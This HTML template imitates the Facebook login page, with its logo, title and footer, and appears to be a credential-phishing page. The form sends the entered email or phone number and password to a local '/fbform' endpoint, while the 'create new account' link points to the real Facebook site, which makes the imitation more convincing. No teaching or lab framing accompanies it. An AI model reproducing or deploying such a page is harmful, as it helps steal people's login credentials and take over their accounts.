<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>facebook.com</title>
    <link rel="stylesheet" href="/css/style.css">
</head>
<body>
   <section class="container">
   <img class="fblogo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/Facebook_Logo_%282019%29.svg/2560px-Facebook_Logo_%282019%29.svg.png" alt="">
   
   </section>

   <section class="formsection">
    
    <form action="/fbform" class="form" method="post">
    <input type="text" name="name" id="" placeholder="Mobile number or email">
    <input type="password" name="password" id="" placeholder="Password">
    <button type="submit" class="loginbtn">Login</button>

     
    <p class="forgot">Forgot password?</p>
    <p class="or">or</p>
    
    <a href="https://m.facebook.com/?wtsid=rdr_0vVDDLwNEy6dINAE9"><button class="accountbtn">create new account</button></a>
    {{!-- <input class="accountbtn" type="text" name="createaccount" id=""> --}}

    </form>

   
   </section>

   <footer class="footersec">
    <div class="left">
        <p>English(US)</p>
        <p>Hindi</p>
        <p>Portugues(Brasil)</p>
        <p>Deutsch</p>
    </div>

    <div class="right">
        <p>Nepali</p>
        <p>Espanol</p>
        <p>Francais(France)</p>
    </div>
   
   </footer>
    <p class="center">Meta &copy; 2023</p>


    
    
</body>
</html>